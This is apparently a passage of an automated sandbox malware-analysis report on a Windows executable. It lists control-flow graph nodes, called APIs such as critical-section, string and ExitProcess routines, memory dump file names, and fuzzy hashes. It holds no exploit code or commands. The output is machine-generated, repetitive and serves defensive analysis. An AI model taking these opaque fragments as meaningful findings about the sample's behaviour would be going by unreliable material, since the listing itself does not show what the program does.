                                                                                                        control_flow_graph 100 4047ce-407aba call 4025e0 105 407ad8 100->105 106 407abc-407ad6 100->106 107 407ae2-407b15 105->107 106->107 110 407b17-407b38 107->110 111 407b3a 107->111 112 407b44-407b75 110->112 111->112 115 407b77-407b98 112->115 116 407b9a 112->116 117 407ba4-407bc4 115->117 116->117 120 407bd3-407be1 117->120 121 407bc6 117->121 122 407be3-407bfd 120->122 123 407bff 120->123 121->120 124 407c09-407c3c 122->124 123->124 127 407c61 124->127 128 407c3e-407c5f 124->128 129 407c6b-407c97 127->129 128->129 132 407c99-407cba 129->132 133 407cbc 129->133 134 407cc6-407cf6 132->134 133->134 138 407cf8-407d19 134->138 139 407d1b 134->139 140 407d25-407d33 138->140 139->140 142 407d51 140->142 143 407d35-407d4f 140->143 144 407d5b-407d8e 142->144 143->144 147 407d90-407db1 144->147 148 407db3 144->148 149 407dbd-407deb 147->149 148->149 152 407e10 149->152 153 407ded-407e0e 149->153 154 407e1a-407e70 152->154 153->154 161 407e76-407e84 154->161 162 407f98-407fa6 154->162 165 407ea2 161->165 166 407e86-407ea0 161->166 163 407fc4 162->163 164 407fa8-407fc2 162->164 167 407fce-408001 163->167 164->167 168 407eac-407edf 165->168 166->168 175 408003-408024 167->175 176 408026 167->176 173 407ee1-407f02 168->173 174 407f04 168->174 177 407f0e-407f3c 173->177 174->177 178 408030-40805e 175->178 176->178 185 407f61 177->185 186 407f3e-407f5f 177->186 183 408060-408081 178->183 184 408083 178->184 187 40808d-4080b0 183->187 184->187 188 407f6b-407f93 185->188 186->188 195 4080b9-408110 call 40ee70 187->195 188->195 203 408112-40812c 195->203 204 40812e 195->204 205 408138-40816b 203->205 204->205 208 408190 205->208 209 40816d-40818e 205->209 210 40819a-4081c8 208->210 209->210 213 4081ca-4081eb 210->213 214 4081ed 210->214 215 4081f7-4087e2 call 40ee70 * 12 call 4125a0 213->215 214->215 335 4087e7-40885d 215->335 343 4088bb-4088d6 335->343 344 40885f-4088b6 call 418c90 * 2 335->344 348 408979-408994 343->348 349 4088dc-4088f5 call 4125a0 343->349 356 408a32-408c4f call 40ee70 * 6 344->356 348->356 357 40899a-4089b3 call 4125a0 348->357 358 408937-408974 349->358 359 4088f7-408930 call 40fba0 call 415660 349->359 367 4089f5-408a25 357->367 368 4089b5-4089ee call 40fba0 call 415660 357->368 358->356 359->358 367->356 368->367
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RO$;$MGH+$2$Once$S$~
                                                                                                        • API String ID: 0-884499449
                                                                                                        • Opcode ID: f3b9d97ce9a9ce714630864383cf758be6ec345587d7d0063048fb4146a72bca
                                                                                                        • Instruction ID: d8ffa30b5bef139f52c4a73f7c17676408c317d34ff610f7f65341f5a4a4674a
                                                                                                        • Opcode Fuzzy Hash: f3b9d97ce9a9ce714630864383cf758be6ec345587d7d0063048fb4146a72bca
                                                                                                        • Instruction Fuzzy Hash: B2B2FB71900218EFDB14DFA0DD48BEEBBB5FB48305F10816AE206B72A4DB745A85CF59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 441 42535b-425362 440->441 442 425369-425372 call 424fc4 440->442 441->442 445 425364-425366 441->445 451 425374-42537b 442->451 452 42537d-425382 442->452 445->442 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 462 4253b4 call 425254 460->462 463 4253b9-4253bc 460->463 461->453 464 42539a-42539b FreeLibrary 461->464 462->463 466 4253d8-4253e5 463->466 467 4253be-4253c5 463->467 464->453 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4"B$<"B
                                                                                                        • API String ID: 0-2488709930
                                                                                                        • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                                                                        • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 418 4250a4-4250e8 419 4250ea 418->419 420 4250ec-42511e call 424f7c 418->420 419->420 423 425120-425122 420->423 424 425127-42512e 420->424 423->424 425 425124 423->425 426 425130-425133 424->426 427 425138-42513e 424->427 425->424 426->427 428 425143-42514a 427->428 429 425140 427->429 430 425159-42515d 428->430 431 42514c-425153 428->431 429->428 432 425163 call 425034 430->432 433 425310-425323 430->433 431->430 437 425168 432->437 435 425325-425328 433->435 436 42533b-425342 433->436 435->436 438 42532a-425339 435->438 439 425344-425350 call 4251f8 call 425284 436->439 440 425355-425359 436->440 438->436 439->440 441 42535b-425362 440->441 442 425369-425372 call 424fc4 440->442 441->442 445 425364-425366 441->445 451 425374-42537b 442->451 452 42537d-425382 442->452 445->442 451->452 453 4253a0-4253a9 call 424f9c 451->453 452->453 454 425384-425394 call 427300 452->454 459 4253ab 453->459 460 4253ae-4253b2 453->460 454->453 461 425396-425398 454->461 459->460 462 4253b4 call 425254 460->462 463 4253b9-4253bc 460->463 461->453 464 42539a-42539b FreeLibrary 461->464 462->463 466 4253d8-4253e5 463->466 467 4253be-4253c5 463->467 464->453 466->440 468 4253c7 467->468 469 4253cd-4253d3 ExitProcess 467->469 468->469
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4"B$<"B
                                                                                                        • API String ID: 0-2488709930
                                                                                                        • Opcode ID: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction ID: 65bcb0f9bbfcf1aa0aff5c5ea0019528e461f84089a416b068b7ddcb0c1446eb
                                                                                                        • Opcode Fuzzy Hash: d6edd425fe0c5ab182e6e5038ed70a65a46b0eec0c5a8e1aaebca3ffb2013342
                                                                                                        • Instruction Fuzzy Hash: 6E41C570A00A20DFDB24DF68F8487AA7BE0BB18354F94A15FE844C7351D7B99C88DB59

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 484 422c97 479->484 485 422c8d-422c92 RtlLeaveCriticalSection 479->485 481 422c3c-422c4e 480->481 481->481 483 422c50-422c70 481->483 483->479 485->484
                                                                                                        APIs
                                                                                                        • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 730355536-0
                                                                                                        • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                                                                        • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                                                                        • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                                                                        • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 470 422bd0-422bf3 RtlInitializeCriticalSection 471 422bf5-422bfa RtlEnterCriticalSection 470->471 472 422bff-422c35 call 42244c * 3 LocalAlloc 470->472 471->472 479 422c77-422c8b 472->479 480 422c37 472->480 484 422c97 479->484 485 422c8d-422c92 RtlLeaveCriticalSection 479->485 481 422c3c-422c4e 480->481 481->481 483 422c50-422c70 481->483 483->479 485->484
                                                                                                        APIs
                                                                                                        • RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,00000000,?,004235F6,00000000), ref: 00422C24
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                        • String ID:
                                                                                                        • API String ID: 730355536-0
                                                                                                        • Opcode ID: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                                                                        • Instruction ID: 92aa11e2a0a4aba1e81e32eba7e2178d1e8dd4665264a38a8387338d13c7a394
                                                                                                        • Opcode Fuzzy Hash: b491cc64b7a9910419e4ab8d36c53fd1b477c0733fba9c8d54940aed9c6bdc4f
                                                                                                        • Instruction Fuzzy Hash: AC11E670784320BFE314EF6AE605BAD7FE5E758304F90806AE00097391C6BE6D84DA1D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 486 425c04-425c06 487 425bc8-425bcc 486->487 488 425c0c-425c11 486->488 490 425bce-425bdb SysFreeString 487->490 491 425bdc 487->491 488->487 489 425c17-425c21 SysReAllocStringLen 488->489 492 425c27 489->492 493 425b98-4261dc 489->493 490->491 495 4261f6 493->495 496 4261de-4261ee SysAllocStringLen 493->496 496->493 497 4261f4 496->497 497->495
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                                                                        • SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree
                                                                                                        • String ID: "lB
                                                                                                        • API String ID: 344208780-2501005195
                                                                                                        • Opcode ID: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                                                                        • Instruction ID: 1ef83d56cbdf2652bb4066a39517635c9c34684a331697f53fb0bb73bc7ca3e4
                                                                                                        • Opcode Fuzzy Hash: df0683008a577a838ccdc220bd5f6f3581af13251a19c4261ec83605024432ba
                                                                                                        • Instruction Fuzzy Hash: FAD012B43006216DEE149A25A901A372A7A9FD1722BE9864EB8019A245DA7CAC01962C

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 498 408c50-408d9c call 40ee70 * 4 523 408da2-408e7d 498->523 524 4091be-4091da 498->524 621 408e86-408e87 call 410180 523->621 527 4091e0-409209 call 4125a0 524->527 528 40948c-4094a8 524->528 535 40924b-409296 527->535 536 40920b-409244 call 40fba0 call 415660 527->536 533 409b34-409bba call 40ee70 * 2 528->533 534 4094ae-4094c7 call 4125a0 528->534 584 409bc3-409bc9 533->584 545 409509-409582 534->545 546 4094c9-409502 call 40fba0 call 415660 534->546 560 409298-4092a4 call 404c14 535->560 561 4092aa-40933d call 40ee70 535->561 536->535 585 409584-4095a5 545->585 586 4095a7 545->586 546->545 560->561 604 409362 561->604 605 40933f-409360 561->605 591 409bd0-409c56 584->591 588 4095b1-409646 call 410fb0 call 40ee70 585->588 586->588 635 4097e2-409858 call 410fb0 call 40ee70 588->635 636 40964c-4097dd call 40ee70 * 2 588->636 634 409c5f-409c67 call 411590 591->634 609 40936c-4093ff call 410780 604->609 605->609 667 409405-40947e 609->667 668 409487 609->668 626 408e8c-408f96 621->626 775 408f9f-408fa0 call 410180 626->775 640 409c6c-409c97 634->640 695 409aad-409af7 635->695 696 40985e-40986c 635->696 636->695 652 409c99-409ca6 640->652 653 409cab-409cb9 call 4125a0 640->653 663 409dec-409e72 call 40ee70 * 2 652->663 658 409cbe-409cc4 653->658 662 409cca-409ce4 658->662 658->663 676 40aba7 662->676 677 409cea-409d4b 662->677 742 409e7b-409e82 663->742 667->668 669 409ee9-40a26c call 418c90 * 2 call 418a10 * 2 call 40ee70 * 7 668->669 896 40a272-40a2b9 call 40f8f0 669->896 897 40aa5b-40aa71 call 40f1d0 669->897 676->676 753 409d54-409d55 call 410180 677->753 733 409af9-409b1a 695->733 734 409b1c 695->734 700 40988a 696->700 701 40986e-409888 696->701 707 409894-4098c7 700->707 701->707 718 4098c9-4098ea 707->718 719 4098ec 707->719 724 4098f6-409924 718->724 719->724 740 409926-409947 724->740 741 409949 724->741 735 409b26-409b2f 733->735 734->735 735->669 747 409953-409aaa 740->747 741->747 751 409e89-409ea9 742->751 747->695 751->676 762 409d5a-409d6a 753->762 768 409d72-409d81 call 40fba0 762->768 774 409d86 768->774 781 409d93-409da7 call 415660 774->781 783 408fa5-40901f 775->783 788 409dac-409db1 781->788 817 409028-409029 call 410180 783->817 789 409db3 788->789 790 409db5-409dd0 788->790 793 409dd6-409de5 789->793 790->677 790->793 793->663 822 40902e-409168 817->822 883 409171-409172 call 410180 822->883 886 409177-4091b9 883->886 910 40a329-40a370 call 40f8f0 896->910 911 40a2bb-40a320 896->911 901 40aa73-40aa7a call 40f1a0 897->901 902 40aa7f-40aac9 897->902 901->902 913 40aacb-40aaec 902->913 914 40aaee 902->914 929 40a3e0-40a427 call 40f8f0 910->929 930 40a372-40a3d7 910->930 911->910 917 40aaf8-40ab84 913->917 914->917 943 40a497-40a4de call 40f8f0 929->943 944 40a429-40a48e 929->944 930->929 956 40a4e0-40a545 943->956 957 40a54e-40a595 call 40f8f0 943->957 944->943 956->957 969 40a605-40a64c call 40f8f0 957->969 970 40a597-40a5fc 957->970 982 40a6bc-40a703 call 40f8f0 969->982 983 40a64e-40a6b3 969->983 970->969 995 40a773-40a7ba call 40f8f0 982->995 996 40a705-40a76a 982->996 983->982 1008 40a82a-40a871 call 40f8f0 995->1008 1009 40a7bc-40a821 995->1009 996->995 1021 40a8e1-40a928 call 40f8f0 1008->1021 1022 40a873-40a8d8 1008->1022 1009->1008 1034 40a998-40a9df call 40f8f0 1021->1034 1035 40a92a-40a98f 1021->1035 1022->1021 1047 40a9e1-40aa46 1034->1047 1048 40aa4f-40aa56 1034->1048 1035->1034 1047->1048
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PR$ SE$w
                                                                                                        • API String ID: 0-1208491823
                                                                                                        • Opcode ID: 0bb3feb81a7f0a7f97eb96e07472ccc361aa35c21bfa60d3feb395852ad7d0a7
                                                                                                        • Instruction ID: f53b976b8ce61006246660fcac2eda25318b73a03b651b78969d3c0f2ac0d1d0
                                                                                                        • Opcode Fuzzy Hash: 0bb3feb81a7f0a7f97eb96e07472ccc361aa35c21bfa60d3feb395852ad7d0a7
                                                                                                        • Instruction Fuzzy Hash: 4BC2BB75900208EFDB14DFE0ED98EEE7B79FB48301F10816AF606A72A0DB745A45CB58

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1057 409eac-409ecf 1058 409ed6-40a26c call 418c90 * 2 call 418a10 * 2 call 40ee70 * 7 1057->1058 1125 40a272-40a2b9 call 40f8f0 1058->1125 1126 40aa5b-40aa71 call 40f1d0 1058->1126 1139 40a329-40a370 call 40f8f0 1125->1139 1140 40a2bb-40a320 1125->1140 1130 40aa73-40aa7a call 40f1a0 1126->1130 1131 40aa7f-40aac9 1126->1131 1130->1131 1142 40aacb-40aaec 1131->1142 1143 40aaee 1131->1143 1158 40a3e0-40a427 call 40f8f0 1139->1158 1159 40a372-40a3d7 1139->1159 1140->1139 1146 40aaf8-40ab84 1142->1146 1143->1146 1172 40a497-40a4de call 40f8f0 1158->1172 1173 40a429-40a48e 1158->1173 1159->1158 1185 40a4e0-40a545 1172->1185 1186 40a54e-40a595 call 40f8f0 1172->1186 1173->1172 1185->1186 1198 40a605-40a64c call 40f8f0 1186->1198 1199 40a597-40a5fc 1186->1199 1211 40a6bc-40a703 call 40f8f0 1198->1211 1212 40a64e-40a6b3 1198->1212 1199->1198 1224 40a773-40a7ba call 40f8f0 1211->1224 1225 40a705-40a76a 1211->1225 1212->1211 1237 40a82a-40a871 call 40f8f0 1224->1237 1238 40a7bc-40a821 1224->1238 1225->1224 1250 40a8e1-40a928 call 40f8f0 1237->1250 1251 40a873-40a8d8 1237->1251 1238->1237 1263 40a998-40a9df call 40f8f0 1250->1263 1264 40a92a-40a98f 1250->1264 1251->1250 1276 40a9e1-40aa46 1263->1276 1277 40aa4f-40aa56 1263->1277 1264->1263 1276->1277
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RO$Once$~
                                                                                                        • API String ID: 0-3270136502
                                                                                                        • Opcode ID: 15041839a937713746e3f4312b3675876991312ceadf5e83856370eba5ccc6e5
                                                                                                        • Instruction ID: 1667f987b5a64c16821490a26d3e430a305355326ab2a6fdd53f3992641b3f76
                                                                                                        • Opcode Fuzzy Hash: 15041839a937713746e3f4312b3675876991312ceadf5e83856370eba5ccc6e5
                                                                                                        • Instruction Fuzzy Hash: E772E771910218EFDB14EFA0EE48AEEBB75FF58301F108169F506A72B0DB345A49CB58
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$Free$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 986138563-0
                                                                                                        • Opcode ID: 5c52406ce0d2c8db834f185b050696e946b88e2200d6a0afff53845239498f34
                                                                                                        • Instruction ID: 3eae97abf8ecebea3d74af2ed52a13b421a08b1f32e908a3b18502d36c4b6d2c
                                                                                                        • Opcode Fuzzy Hash: 5c52406ce0d2c8db834f185b050696e946b88e2200d6a0afff53845239498f34
                                                                                                        • Instruction Fuzzy Hash: 9CE0ECB83016216DEE156F32AD01B372B29AF81711BE5495EF8009A215DA7CAC41662D

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1286 425bc8-425bcc 1287 425bce-425bdb SysFreeString 1286->1287 1288 425bdc 1286->1288 1287->1288
                                                                                                        APIs
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeString
                                                                                                        • String ID: "lB
                                                                                                        • API String ID: 3341692771-2501005195
                                                                                                        • Opcode ID: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                                                                        • Instruction ID: 2e196b39daa8764921be558a5a387240bacd155c0bdd8e0ce52a32d021dcfd8b
                                                                                                        • Opcode Fuzzy Hash: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                                                                        • Instruction Fuzzy Hash: 60B092B42022106EE6119B21AC40B27362AABC1711FB9898AA8008A128CB7CAC019628

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1289 42342c-42343c 1290 423447-42344d 1289->1290 1291 42343e call 422bd0 1289->1291 1293 423459-42346e 1290->1293 1294 42344f-423454 1290->1294 1295 423443-423445 1291->1295 1297 423470-423475 RtlEnterCriticalSection 1293->1297 1298 42347a-423483 1293->1298 1296 4235cf-4235d6 1294->1296 1295->1290 1295->1294 1297->1298 1299 423485 1298->1299 1300 42348a-423490 1298->1300 1299->1300 1301 423542-423548 1300->1301 1302 423496-42349a 1300->1302 1305 42354a-423557 1301->1305 1306 42359d-42359f call 4232e4 1301->1306 1303 42349f-4234b3 1302->1303 1304 42349c 1302->1304 1303->1301 1308 4234b9-4234d6 1303->1308 1304->1303 1309 423566-42359b call 424e24 1305->1309 1310 423559-423561 1305->1310 1311 4235a4-4235bb 1306->1311 1312 4234e6-42350a 1308->1312 1313 4234d8-4234e4 1308->1313 1309->1296 1310->1309 1318 4235c7 1311->1318 1319 4235bd-4235c2 RtlLeaveCriticalSection 1311->1319 1317 42350c-42353d call 424e24 1312->1317 1313->1317 1317->1296 1319->1318
                                                                                                        APIs
                                                                                                          • Part of subcall function 00422BD0: RtlInitializeCriticalSection.NTDLL(0051C5CC), ref: 00422BE7
                                                                                                          • Part of subcall function 00422BD0: RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00422BFA
                                                                                                          • Part of subcall function 00422BD0: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00422C98,?,?,?,004235F6), ref: 00422C24
                                                                                                          • Part of subcall function 00422BD0: RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 00422C92
                                                                                                        • RtlEnterCriticalSection.NTDLL(0051C5CC), ref: 00423475
                                                                                                        • RtlLeaveCriticalSection.NTDLL(0051C5CC), ref: 004235C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
